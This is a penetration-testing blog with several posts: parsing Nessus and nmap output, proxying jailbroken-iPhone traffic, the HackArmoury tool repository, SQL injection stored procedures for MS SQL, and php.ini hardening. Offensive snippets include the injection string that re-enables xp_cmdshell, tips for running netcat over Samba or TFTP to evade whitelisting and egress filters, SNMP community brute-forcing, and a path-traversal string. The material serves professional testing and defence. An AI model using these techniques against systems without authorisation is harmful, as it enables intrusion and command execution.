Monday, 18 February 2013

De-duping multiple interface nessus results with sed.

A bit of a mouthful and not that useful for most, but this is saving me headaches left, right and centre at the moment (and is dead simple).

It's always an issue when testing a network that you can run into the same box multiple times with different addresses, this became all too apparent to me recently when I was testing 4 boxes with over 20 interfaces between them serving up different services. Now when it comes to reporting the customer isn't going to want to know about the same issues on the same ports on the same box multiple times, but  manually separating this lot out of Nessus is a nightmare.... sed to the rescue.

Lets assume that you have your Nessus output and have it it some useful parse-able format. (xmlstarlet anyone?)

lets also assume that you have a list of ips that match up to each hostname. First things first, create a ip2host.sed file and fill it with your replace statements, e.g.

s/192.168.0.1/host1/g
s/192.168.0.2/host1/g
s/192.168.0.3/host1/g
s/192.168.0.4/host1/g
s/192.168.0.5/host2/g
s/192.168.0.6/host2/g
s/192.168.0.7/host3/g
s/192.168.0.8/host3/g

Next step is nice and simple, either:

sed -f ip2host.sed << EOF | sort | uniq

and copy and paste your results into the terminal, ending with an EOF or...

sed -f ip2host.sed < fileofservices.txt | sort | uniq

if you've already saved the file. This will take:

192.168.0.1:443
192.168.0.2:443
192.168.0.3:443
192.168.0.5:25
etc

and convert it to:

host1:443
host2:25
etc.

Not a complicated one today, but always a handy one to remember.

Ben





Thursday, 15 November 2012

Proxying 3G iPhone Data



Hey! It's been a while, I promised you guys that I'd do this more often and I've failed you and for that I am sorry (well sort of). So today I'm taking a break from automation to talk to you lovely folks about something I've been working on lately, proxying. Not just proxying, but proxying iPhone apps. No wait, not just proxying iPhone apps, but proxying iPhone apps traffic over 3G. Is there a setting for that? No! (At least there isn't in iOS 5, 6 does, but only through the configuration utility)

It was a pain in the ass, but it is possible with caveats. Firstly, the iPhone has to be jailbroken, secondly, you need to edit some config files. If you're cool with that read on.

Step 1

Jailbreak your phone.

Step 2

Edit the /private/var/preferences/SystemConfiguration/preferences.plist file.

Locate the "ip1" section:

<dict> 
<key>Interface</key> 
<dict> 
<key>DeviceName</key> 
<string>ip1</string> 
<key>Hardware</key> 
<string>com.apple.CommCenter</string>
 <key>Type</key>
 <string>com.apple.CommCenter</string>
 </dict> 

Then add the following section afterwards:

<key>Proxies</key> 
<dict>
 <key>ProxyAutoConfigEnable</key>
 <integer>1</integer>
 <key>ProxyAutoConfigURLString</key>
 <string>file:///private/var/preferences/proxy.pac</string> 
</dict>

Step 3

Create the following file: /private/var/preferences/proxy.pac

and add the following.

function FindProxyForURL(url, host)
{
return "PROXY YOUR_EXTERNAL_IP:8080";
}

Note: As this is over the 3G network, your proxy needs to be available on the internet, if you're planning on using burp I'd probably use a netcat tunnel to use your proxy on a box you have on EC2, alternatively just open up a port on your home router and use that.

Step 4

Fire up your proxy and restart your phone, it doesn't get much simpler than that.

Step X

Something I've been doing to make app testing a bit easier is use Veency, it's a VNC tool (available on Cydia) for your iPhone allowing you to interact with it via your PC, it makes life a lot easier when you have full use of your keyboard and mouse on your phone.

Proxying 3G traffic actually yielded some interesting results, certain apps that weren't even active authenticated (over plain text) with their servers on phone boot. I won't give away who here, but they have been notified that this is bad.

Hope that was somewhat useful, it was for me anyway, until next time, come say hello @bdpuk.

Byeeeeeeeeeeee.

Tuesday, 17 July 2012

PaulDotCom Interview

A big thanks to Paul and Mike and Larry (and Carlos) for having us on the show, we really enjoyed it. Apologies for being a bit up-tight in places, but we're British, it's what we do. And, for the record, I like Nessus really (Printers don't) and SANS rock (apart from their examination style). You can check out the video of us chatting shite here: http://pauldotcom.com/2012/07/pentesticles-penetration-testi.html I'll be emailing Paul with some better 'your Network's shite' comments in the London vernacular! PENTESTICLES AWAY!!!!

Thursday, 12 July 2012

HackArmoury.com - A Pentesticles Project!


Recently, we at Pentesticles took over the ownership and full development of HackArmoury.com. So, I thought it was time to write a blog post about it and speak a bit about what it does, how to use it and what we’re planning for it in the future. We'll be talking a bit about this tonight (12th July 2012) at 11pm UK time (6pm ET) on pauldotcom also, make sure you don't miss it!.

HackArmoury is something I’ve personally been involved in since its creation (by me ol’ mucka @nopslider) and has proven to be a useful resource for the Penetration Testing community. Ben and I are now putting a bit of focus on it and continuing its development and maintenance. I've also skinned the site since the change over, I'm still not sure about the Tango-orange colour. It's not a dig at gingers, honest.

So, what is HackArmoury? For those who haven’t used it, it’s essentially a tool repository for Ethical Hacking and Penetration testing. The key advantage is that HackArmoury can be accessed over loads of popular protocols including SVN, TFTP, HTTP, IPv6 and Samba (see below for the full list and instructions) and older versions of tools are maintained. This means that if there are network restrictions on where you’re trying to update from, you have the best chance of being able to connect and get your tools.

Another key feature of the site is that the entire repository of tools is packed into a single ISO, which can be downloaded directly. Each time a new tool is added, the ISO is updated and re-packed meaning that it’s always up-to-date.

Our next addition with be GIT, as this is an obvious hole. Once we sort the technical aspects and work out the security implications, we'll be ready to go! 

We're always looking for trustworthy contributors, so if you fancy helping us tool-up, please drop me an email at lawrence[at]hackarmoury.com or through the comments on this blog. In the meantime, I hope you enjoy using the site and it proves useful.

How can I connect? There are lots of ways to connect up, you can do this via the following methods:


IPv6 is now supported by HackArmoury (2a02:af8:1000:8c::2f98:4ed7). If you want to access us directly over IPv6, and you can't remember a 128bit address, use the hostname ipv6.hackarmoury.com. All of our common protocols will be supported.


You can access all your tools straight over Samba using \\hackarmoury.com\tools\. No authentication required, just start->run->\\hackarmoury.com\tools\ and you're away.

For example, to run nc.exe, simple type \\hackarmoury.com\tools\all_binaries\nc.exe. If running on a Windows host with executable black listing or whitelisting, it's always worth testing over Samba too. In many cases this execution method is permitted without consideration for the consequences.

HTTP

Everything in the toolkit is browseable over HTTP and HTTPS. Navigate directly to http://hackarmoury.com/tools  and you're away.


To minimise download bandwidth, you can keep up-to-date with our tool set over Rsync. Use the following command to download after reading our licensing terms here:

rsync -avz rsync://hackarmoury.com/tools /ha

As with all other protocols, no authentication is required to download.


You can keep an offline copy of the armoury simply by doing a subversion checkout. If you're regularly running the tools, it makes much more sense to keep an offline copy for speed and portability. It’s a much more efficient way of keeping up-to-date with new tools, as you don't need to be scouting around the site or downloading large ISO images.

Simply type:

svn co svn://hackarmoury.com/live /ha

To update, navigate to your local directory and perform:

svn update


Executable files only are available over TFTP due to the inability of having a directory structure, and you must know the name of the file in advance.

You can download files like this:

tftp -i hackarmoury.com get nc.exe

You may find this useful in some poorly implemented egress filtering scenarios.

Tuesday, 29 May 2012

We Have the Port Scans, what now?


It's been a while, I hope you're good. I'm fine thanks, busy as sin but isn't that always the way? So where did we leave off? From reading back through my previous post, we'd scanned our little guts out and pulled a list of all ports that were open and all the services that can be interacted with. Boy haven't we been busy! 

It just so happens that now is when the real fun begins. Have a bit of a perouse through the results, not that easy to read aye? Sure we can quickly find some 135, 445 and have a quick fiddle through the lovely lovely file shares, but where's the automation? This post should cover some basics about gathering even more data from the services we've identified using our ever faithful set of tools such as nikto, gnome-web-photo, curl et al and keeping the data useable.

First things first, let's bring all of our results together in a more machine readable way. From the previous post we've grabbed all of our nmap output into the three decent formats, plain, greppable and xml. For the purposes of this post we'll be using the xml format and parsing it using xmlstarlet (for those of you that aren't already using starlet, grab a copy, it's a brilliant little command line parser that I can't live without, nessus, nmap, surecheck, anything that dumps xml suddenly becomes friendly to use again!)

The little gem i've been using for a while now is:

cat port_scans/hot-targets.tcp.services | xmlstarlet sel -T -t -m "//state[@state='open']" -m ../../.. -v address/@addr -m hostnames/hostname -i @name -o '  (' -v @name -o ')' -b -b -b -o "," -m .. -v @portid -o ',' -v @protocol -o "," -m service -v @name -i "@tunnel='ssl'" -o 's' -b -o "," -v @product -o ' ' -v @version -v @extrainfo -b -n -| sed 's_^\([^\t ]*\)\( ([^)]*)\)\?\t\([^\t ]*\)_\1.\3\2_' | sort -n -t.

This is a slightly bastardised version of this oneliner brought to you from the lovely folks at redspin. It takes an nmap xml output file (singular in this case) and creates output like this:

10.13.37.10,22,tcp,ssh,OpenSSH 4.3protocol 2.0
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,3260,tcp,iscsi,
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,427,tcp,svrloc,
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,5989,tcp,tcpwrapped,
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,8042,tcp,fs-agent,
10.13.37.11,8045,tcp,unknown,
10.13.37.11,80,tcp,http,
10.13.37.11,8100,tcp,tcpwrapped,
10.13.37.11,902,tcp,vmware-auths,VMware Authentication Daemon 1.10

Isn't this a lot more greppable than -oG ? Having the data dumped out to csv allows us to rapidly move through and select the exact services we want to interogate. An example:

root@bt:~# cat output.csv | grep http
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,80,tcp,http, 

An even better example:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":"
10.13.37.10:2301
10.13.37.10:2381
10.13.37.10:5988
10.13.37.10:5989
10.13.37.11:443
10.13.37.11:8000
10.13.37.11:80

An even better example still:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | while read line; do /pentest/web/nikto/nikto.pl -config /pentest/web/nikto/nikto.conf -h $line -output $line.txt; done
....snip....

You get the idea.

While we're on the subject, a nice precursor to nikto is a bit of web scouring. We've all been in the situation before where we've been on a internal test with limited time only to discover 100 webservers spread across the network, it's always a case of best efforts and being left wondering if the ones we missed were the ones that would've bent over. This is where webscour comes in. It's a little script from Geoff over at Cyberis (Available here) that given a list of addresses grabs screenshots (using gnome-web-photo) and header information from each webserver and produces a handy html file to view them all from. Suddenly all the default content and HP OpenViews can be found quickly and we can move straight onto the Accounting App running Classic ASP on IIS4 that hasn't been in use for 5 years.

Incidently this can be run in a similar fashion to the one liner above:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | ./webscour.pl webservers.htm

As you can imagine there is a lot more we can do with webservers, dirbuster, skipfish the sitekiller and any other forcedbrowse/fuzzer can usually be used in this way, and as always the more data the better.

Next steps as far as web servers are concerned usually involve getting this information into Burp, that way we can play with it properly. Buby is a sensible choice and further down the line we'll look into automated spidering and active scanning from the terminal, replaying nikto/dirbuster output directly into Burp and also utilising the FuzzDB to profile out any CMSs we come across. But that unfortunately will have to wait for another post.

As usual any thoughts, critiques or straight forward calling out either head down to the comments or hit me up on twitter. Hwyl am Nawr!

Final Thoughts

It wouldn't be fair if I weren't to go off topic at least once in a post so here you go....

cat output.csv | grep 161,udp | cut -f 1 -d "," | /pentest/enumeration/snmp/onesixtyone/onesixtyone -c /pentest/enumeration/snmp/onesixtyone/dict.txt -o onesixtyone.out -i -

Have some snmp fun ya'll!

Tuesday, 8 May 2012

MS SQL - Useful Stored Procedures for SQL Injection and Ports Info.



The following post lists and describes various useful stored procedures and port information for MS SQL. The information is relevant for all versions unless stated (there may be a couple of mistakes, so corrections are welcome). The information is from many different sources including MS Technet, various books and several people’s brains (mostly mine - such as it is!). Its main use is as a learning tool or reference for performing SQL injection attacks.

Important Stored procedures

sp_columns – returns column names of tables
sp_configure – Returns internal database settings. Allows you to specific a particular setting and retrieve the value.
sp_dboption – Views or sets user configurable database options
sp_who2 and sp_who – Displays usernames, the client from which they’re connected, the application used to connect to the database, the command executed on the database and several other pieces of info.


Parameterised Extended stored procedures

xp_cmdshell - The default current directory is %SystemRoot%\System32. This procedure is disabled in SQL 2005 onwards by default, but can be re-enabled remotely by running the following command (either as a straight query or as part of an injection):

;exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

SQLmap (--os-cmd) will do this automatically, but I haven’t had much success with it on real-world test.

xp_regread – Reads a registry value.
xp_servicecontrol – Stops or starts a windows service.
xp_terminate_service – Kills a process based on its process ID.

Non-parameterised Extended Stored Procedures

xp_loginconfig – Displays login information, particularly the login mode (mixed etc) and default login.
xp_logininfo – Shows currently logged in accounts (NTLM accounts).
xp_msver – Lists SQL version and platform info.
xp_enumdsn – Enumerates ODBC data sources.
xp_enumgroups – Enumerates Windows groups.

System Table Objects

Many of the system tables from earlier releases of SQL Server are now implemented as a set of views. These views are known as compatibility views, and they are meant for backward compatibility only. The compatibility views expose the same metadata that was available in SQL Server 2000. However, the compatibility views do not expose any of the metadata related to features that are introduced in SQL Server 2005 and later.

syscolumns (2000) – All column names and stored procedures for the current database
sysusers – All users who can manipulate the database
sysfiles – The file and pathname for the current database and its log file.
systypes – Data types defined by SQL or users.


Master DB Tables

sysconfigures – Current DB config settings.
sysdatabases – Lists all DBs on server
sysdevices –Enumerates devices used for DB
sysxlogins (2000) – Enumerates user info for each permitted user of the database
sql_logins (2005) – Enumerates user info for each permitted user of the database
sysremotelogins – Enumerates user info for all users permitted to remote access DB

Ports

The default ports for MS SQL are TCP/1433 and UDP/1434. However the service can be deployed ‘hidden’ on 2433 (this is MS’s idea of hiding!).

UDP 1434 was introduced in SQL 2000 and provides a referral service for multiple instances of SQL running on the same machine. The service listens on this port and returns the IP address and port number of the requested database.

Below is a script from MS TechNet showing the ‘fix’ for opening ports on Windows Firewall for MS SQL 2008. This is pretty interesting!

@echo =========  SQL Server Ports  ===================
@echo Enabling SQLServer default instance port 1433
netsh firewall set portopening TCP 1433 "SQLServer"
@echo Enabling Dedicated Admin Connection port 1434
netsh firewall set portopening TCP 1434 "SQL Admin Connection"
@echo Enabling conventional SQL Server Service Broker port 4022 
netsh firewall set portopening TCP 4022 "SQL Service Broker"
@echo Enabling Transact-SQL Debugger/RPC port 135
netsh firewall set portopening TCP 135 "SQL Debugger/RPC"
@echo =========  Analysis Services Ports  ==============
@echo Enabling SSAS Default Instance port 2383
netsh firewall set portopening TCP 2383 "Analysis Services"
@echo Enabling SQL Server Browser Service port 2382
netsh firewall set portopening TCP 2382 "SQL Browser"
@echo =========  Misc Applications  ==============
@echo Enabling HTTP port 80
netsh firewall set portopening TCP 80 "HTTP"
@echo Enabling SSL port 443
netsh firewall set portopening TCP 443 "SSL"
@echo Enabling port for SQL Server Browser Service's 'Browse' Button
netsh firewall set portopening UDP 1434 "SQL Browser"
@echo Allowing multicast broadcast response on UDP (Browser Service Enumerations OK)
netsh firewall set multicastbroadcastresponse ENABLE

It’s also worth bearing these other ports in mind when port scanning or enumerating instances of MS SQL.

Wednesday, 2 May 2012

Security Related Directives in php.ini (for Pen Testers and Devs)


For those of you not overly familiar with PHP; php.ini is where you define your settings. As a penetration tester, you should be used to seeing the symptoms of these settings either not being set or being misconfigured. This post aims to pin-point the directives that developers should be familiar with and also show penetration testers the nuts and bolts of the issues they’re seeing so that they may better advise their clients. Feel free to post any more detail or additional directives that you believe should be included.

disable_functions

The disable_functions directive is very important, as it controls which functions are available to be used or abused. When designing an application, if it does not require high risk functions such as eval(), passthru() and system(), etc. then these functions should be disabled. The disable_functions  directive is not affected by Safe Mode however, only internal functions can be disabled using this directive. User-defined functions are unaffected.

open_basedir

Enabling open_basedir will restrict file access to a specifically defined directory. All file operations will then be limited to what has been specified. It is recommended that any file operations should be located within a certain set of directories. If this is implemented, standard canonicalization for directory traversal e.g. “../../../../etc/passwd” will not work. This directive is not affected by Safe Mode being turned on or off.

When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to open it. All symbolic links are resolved, so it's not possible to avoid this restriction with a symlink. If the file doesn't exist then the symlink couldn't be resolved and the filename is compared to (a resolved) open_basedir .

The special value ‘.’ indicates that the working directory of the script will be used as the base-directory. This is, however, a little dangerous as the working directory of the script can easily be changed with chdir().

In httpd.conf, open_basedir can be turned off (e.g. for some virtual hosts) the same way as any other configuration directive with "php_admin_value open_basedir none".
Under Windows, separate the directories with a semicolon. On all other systems, separate the directories with a colon. As an Apache module, open_basedir paths from parent directories are now automatically inherited. The restriction specified with open_basedir is a directory name since PHP 5.2.16 and 5.3.4. Previous versions used it as a prefix. This means that "open_basedir = /dir/incl" also allowed access to "/dir/include" and "/dir/incls" if they exist. When you want to restrict access to only the specified directory, end with a slash. For example: 

open_basedir = /dir/incl/

The default is to allow all files to be opened.

expose_php

Setting this configuration to off will remove the PHP banner that displays in the server header’s response. This is one layer of defence that will obscure the fact that you’re using PHP (by banner grabbing at least) and moreover the version that is being used and is a good defence-in-depth technique.

allow_url_fopen

This directive is designed to prevent remote file inclusion vulnerabilities from working. An example of this would be if the $absolute_path variable in the following code example were set to a value http://www.randomsite.com; the exploit would fail because allow_url_fopen was set.

include ($absolute_path.’inc/adodb.inc.php’);

display_errors

The display_errors directive is a simple but important setting that enables detailed errors to the user on an exception. This setting should always be switched off in a production environment.

safe_mode

Enabling safe-mode in PHP allows strict file access permissions. This is done by checking the permissions of the owner of the PHP script that is running against any file access that the script attempts. Should the permissions not match, PHP throws  a security exception. Safe_mode is commonly used by ISPs, so that multiple users can develop their own PHP scripts without risking the integrity of the server.

register_globals

When enabled, register_globals injects user created scripts with various variables, such as request variables from HTML forms. This functionality coupled with the fact that PHP doesn't require variable initialization means writing insecure code is much easier. A controversial change in PHP after version 4.2.0 was the setting of register_globals to OFF rather than ON. Reliance on this directive was quite common and many people didn't even know it existed and assumed it's just how PHP works. Many users of PHP didn’t understand how this directive worked as it was always on by default and was assumed the inherent behaviour of PHP on the whole. Even though this was a difficult decision, the PHP community decided to disable this directive by default. When enabled, developers use variables yet really don't know for sure where they are generated and often only assume. Internal variables that are defined in the script itself get mixed up with request data sent by users and disabling register_globals changes this.

NB – register_globals has been deprecated as of PHP 5.3.0 and removed as of PHP 5.4.0.

Summary

The settings within php.ini are not a fix-all by any means, but they provide security-in-depth for any application using PHP. As a penetration tester, it’s important to be able to tell developers what they’re doing wrong when vulnerabilities are discovered and understanding how a scripting language such as PHP works on a global level.  A huge pet hate of mine is when testers (Nessus, Core Impact or <Insert automated web security scanner> monkeys) report an issue, don’t understand what the issue is, don’t provide a working example and don’t explain the impact specific to the application. Apart from providing a poor service (which the client is probably paying £1000 per day for) this creates the understanding that all penetration testers do is ‘run scans’ and it takes a lot of time and conversations with security managers and developers to reverse!  Rant over, I hope this is useful as both a learning tool and for reference.

An additional source of information regarding PHP and its directives can be found here: http://ific.uv.es/informatica/manuales/php/ .